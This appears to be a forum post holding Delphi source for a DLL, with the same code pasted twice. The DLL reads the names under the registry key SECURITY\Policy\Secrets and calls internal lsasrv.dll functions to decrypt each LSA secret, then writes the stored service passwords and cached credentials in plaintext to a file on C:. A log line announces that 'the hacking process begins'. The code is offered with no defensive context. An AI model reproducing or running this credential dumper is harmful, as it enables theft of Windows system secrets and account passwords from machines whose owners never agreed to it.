Code:
library Project1;
uses
SysUtils,
Classes, Windows, Registry;
{$R *.res}
type HPOLICY=DWORD;
type HSECRET=DWORD;
type NTSTATUS=CARDINAL;
type LSA_SECRET=record
Length:DWORD;
MaximumLength:DWORD;
Buffer:PWideChar;
end;
function LsaIOpenPolicyTrusted(var p1:HPOLICY): NTSTATUS; stdcall; external 'lsasrv.dll' name'LsaIOpenPolicyTrusted';
function LsarOpenSecret(p1: HPOLICY; var p2: LSA_SECRET; dwAccess: DWORD; var p3: HSECRET): NTSTATUS; stdcall;
external 'lsasrv.dll' name 'LsarOpenSecret';
function LsarQuerySecret(p1: HSECRET; var p2: LSA_SECRET; p3,p4,p5:DWORD): NTSTATUS; stdcall;
external 'lsasrv.dll' name 'LsarQuerySecret';
var f:textfile;
reg:TRegistry;
s:TStringList;
x:integer;
p:PWideChar;
ss:String;
lsaSecret,lsaData:LSA_SECRET;
_hPolicy:HPOLICY;
_hSecret:HSECRET;
begin
_hPolicy:=0;
_hSecret:=0;
AssignFile(f,'c:\mrs111.txt');
Rewrite(f);
WriteLn(f,'Proces hakovanja pocinje... :)');
reg:=TRegistry.Create;
reg.RootKey:=HKEY_LOCAL_MACHINE;
reg.OpenKey('\SECURITY\Policy\Secrets',true);
s:=TStringList.Create;
reg.GetKeyNames(s);
reg.CloseKey;
reg.Free;
LsaIOpenPolicyTrusted(_hPolicy);
for x:=0 to s.Count-1 do
begin
WriteLn(f,s[x]);
ss:=s[x];
GetMem(p,sizeof(widechar)*length(ss));
StringToWideChar(ss,p,sizeof(widechar)*length(ss));
lsaSecret.Buffer:=p;
lsaSecret.Length:=Length(s[x]);
lsaSecret.MaximumLength:=10000;;
LsarOpenSecret (_hPolicy, lsaSecret, 2, _hSecret);
LsarQuerySecret (_hSecret, lsaData, 0, 0, 0);
WriteLn(f,lsaData.Buffer);
FreeMem(p);
end;
CloseFile(f);
s.Free;
end.
library Project1;
uses
SysUtils,
Classes, Windows, Registry;
{$R *.res}
type HPOLICY=DWORD;
type HSECRET=DWORD;
type NTSTATUS=CARDINAL;
type LSA_SECRET=record
Length:DWORD;
MaximumLength:DWORD;
Buffer:PWideChar;
end;
function LsaIOpenPolicyTrusted(var p1:HPOLICY): NTSTATUS; stdcall; external 'lsasrv.dll' name'LsaIOpenPolicyTrusted';
function LsarOpenSecret(p1: HPOLICY; var p2: LSA_SECRET; dwAccess: DWORD; var p3: HSECRET): NTSTATUS; stdcall;
external 'lsasrv.dll' name 'LsarOpenSecret';
function LsarQuerySecret(p1: HSECRET; var p2: LSA_SECRET; p3,p4,p5:DWORD): NTSTATUS; stdcall;
external 'lsasrv.dll' name 'LsarQuerySecret';
var f:textfile;
reg:TRegistry;
s:TStringList;
x:integer;
p:PWideChar;
ss:String;
lsaSecret,lsaData:LSA_SECRET;
_hPolicy:HPOLICY;
_hSecret:HSECRET;
begin
_hPolicy:=0;
_hSecret:=0;
AssignFile(f,'c:\mrs111.txt');
Rewrite(f);
WriteLn(f,'Proces hakovanja pocinje... :)');
reg:=TRegistry.Create;
reg.RootKey:=HKEY_LOCAL_MACHINE;
reg.OpenKey('\SECURITY\Policy\Secrets',true);
s:=TStringList.Create;
reg.GetKeyNames(s);
reg.CloseKey;
reg.Free;
LsaIOpenPolicyTrusted(_hPolicy);
for x:=0 to s.Count-1 do
begin
WriteLn(f,s[x]);
ss:=s[x];
GetMem(p,sizeof(widechar)*length(ss));
StringToWideChar(ss,p,sizeof(widechar)*length(ss));
lsaSecret.Buffer:=p;
lsaSecret.Length:=Length(s[x]);
lsaSecret.MaximumLength:=10000;;
LsarOpenSecret (_hPolicy, lsaSecret, 2, _hSecret);
LsarQuerySecret (_hSecret, lsaData, 0, 0, 0);
WriteLn(f,lsaData.Buffer);
FreeMem(p);
end;
CloseFile(f);
s.Free;
end.